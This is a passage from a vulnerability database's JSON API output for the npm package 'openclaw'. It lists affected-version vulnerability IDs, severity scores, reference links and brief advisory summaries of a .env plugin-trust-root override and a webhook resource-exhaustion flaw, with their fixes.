"vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41344", "GHSA-5h2w-qmfp-ggp6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5atj-2a7b-57g5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89678?format=api", "vulnerability_id": "VCID-5rgx-2krs-guck", "summary": "OpenClaw: Workspace `.env` can override the bundled plugin trust root\n## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41396", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02663", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02716", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02711", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41396" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root" }, { "reference_url": "https://github.com/advisories/GHSA-qcj9-wwgw-6gm8", "reference_id": "GHSA-qcj9-wwgw-6gm8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qcj9-wwgw-6gm8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41396", "GHSA-qcj9-wwgw-6gm8" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5rgx-2krs-guck" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90967?format=api", "vulnerability_id": "VCID-5s6h-u8x6-myfk", "summary": "OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n## Summary\nVoice Call webhook handling buffered request bodies before provider signature checks, enabling bounded unauthenticated resource exhaustion.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `651dc7450b68a5396a009db78ef9382633707ead`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/voice-call/src/webhook.ts now enforces header gating and shared pre-auth body caps before reading attacker-controlled request bodies.\n- extensions/voice-call/src/webhook.test.ts ships regression coverage for missing-signature, oversize, and timeout pre-auth webhook cases.\n\nOpenClaw thanks @SEORY0 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35626", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.3119", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.31121", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.31157", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35626" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook" }, { "reference_url": "https://github.com/advisories/GHSA-rm59-992w-x2mv", "reference_id": "GHSA-rm59-992w-x2mv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rm59-992w-x2mv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { 